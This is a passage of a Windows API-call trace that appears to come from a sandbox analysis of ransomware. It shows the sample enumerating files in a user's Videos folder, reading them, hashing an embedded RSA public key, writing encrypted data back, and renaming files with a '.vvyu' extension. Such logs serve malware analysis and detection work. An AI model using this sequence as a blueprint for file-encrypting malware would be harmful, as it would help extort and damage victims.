HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.290] GetCurrentThreadId () returned 0x66c [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9168 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.291] GetCurrentThreadId () returned 0x66c [0202.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0202.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0202.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0202.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.307] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x9d00, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x9d00, lpOverlapped=0x0) returned 1 [0202.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.308] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x9d05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.308] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.310] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.310] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.310] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.310] CloseHandle (hObject=0x510) returned 1 [0202.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0202.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0202.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0202.313] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\cPfFJ9.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\cpffj9.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\cPfFJ9.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\cpffj9.flv.vvyu")) returned 1 [0202.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.316] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.319] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99db4420, ftCreationTime.dwHighDateTime=0x1d8a1eb, ftLastAccessTime.dwLowDateTime=0x5433b760, ftLastAccessTime.dwHighDateTime=0x1d8a356, ftLastWriteTime.dwLowDateTime=0x5433b760, ftLastWriteTime.dwHighDateTime=0x1d8a356, nFileSizeHigh=0x0, nFileSizeLow=0xaa16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I8OBTvHhmB.swf", cAlternateFileName="I8OBTV~1.SWF")) returned 1 [0202.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91678 [0202.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.319] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\I8OBTvHhmB.swf") returned=".swf" [0202.319] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\I8OBTvHhmB.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\i8obtvhhmb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.320] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=43542) returned 1 [0202.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.323] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xa9f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.323] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.326] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.326] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xaa16, lpOverlapped=0x0) returned 1 [0202.327] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.327] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.327] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.327] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.329] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.329] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.329] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.329] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.329] GetLastError () returned 0x0 [0202.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.329] GetLastError () returned 0x0 [0202.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.330] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.330] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.330] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.330] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.330] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa20) returned 0x2ea99b0 [0202.331] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1a80 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1ac8 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.332] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.333] RtlAllocateHeap 